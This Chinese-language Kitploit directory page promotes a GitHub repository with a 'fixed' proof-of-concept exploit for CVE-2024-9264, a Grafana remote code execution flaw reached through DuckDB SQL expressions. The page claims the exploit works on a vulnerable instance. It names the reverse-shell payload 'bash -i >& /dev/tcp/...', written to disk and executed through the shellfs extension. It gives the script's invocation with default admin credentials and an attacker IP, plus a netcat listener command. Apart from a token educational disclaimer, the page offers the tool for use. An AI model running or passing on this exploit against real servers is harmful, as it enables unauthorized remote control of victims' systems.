Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2024-9264-Fixed — CVE-2024-9264的修复版概念验证漏洞利用,通过DuckDB SQL表达式实现Grafana严重远程代码执行。利用修正后的shellfs扩展和writefile()函数执行反弹shell。 | Kitploit
工具/GitHubGitHub/exerrdev/cve-2024-9264-fixed
漏洞分析漏洞利用Web应用程序漏洞利用学习与教育远程访问工具Payload 开发
GitHubexerrdev/cve-2024-9264-fixed

CVE-2024-9264-Fixed

CVE-2024-9264的修复版概念验证漏洞利用,通过DuckDB SQL表达式实现Grafana严重远程代码执行。利用修正后的shellfs扩展和writefile()函数执行反弹shell。

查看仓库
1年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

🛠️ CVE-2024-9264 - 已修复的 Grafana RCE 漏洞利用

这是一个针对 CVE-2024-9264 的 PoC(概念验证)漏洞利用的 已修复版本,该漏洞是 Grafana 中的一个严重远程代码执行漏洞(通过 SQL 表达式和 DuckDB)。

🔗 原始公告:Grafana Security Release
❌ 原始 PoC:因语法错误和 write_file() 使用不当而失效
✅ 此版本有效,已在一个存在漏洞的 Grafana 11.0.0 实例上测试。


✅ 本版本的修复内容

  • ✅ 正确使用 writefile() 替代 write_file()(DuckDB 函数)
  • ✅ 使用 bash -i >& /dev/tcp/... 的正确 shell 负载
  • ✅ 通过 shellfs 扩展成功写入并执行反向 shell

📦 需求

  • Grafana 实例需满足:
    • DuckDB 后端
    • 能够执行 install shellfs from community
  • 攻击机器上有一个 netcat 监听器

🚀 使用方法

root@kitploit:~
python3 fixed_poc_writefile.py \
  --url http://target:3000 \
  --username admin \
  --password admin \
  --reverse-ip <YOUR_IP> \
  --reverse-port 4444

然后使用以下命令监听:

root@kitploit:~
nc -lvnp 4444

⚠️ 法律免责声明

本项目仅供教育目的。
请勿将其用于未经授权测试的目标。


✍️ 本修复的作者

由 Exerr 修改并验证 — 原始 PoC 由 z3k0sec 编写。

下载工具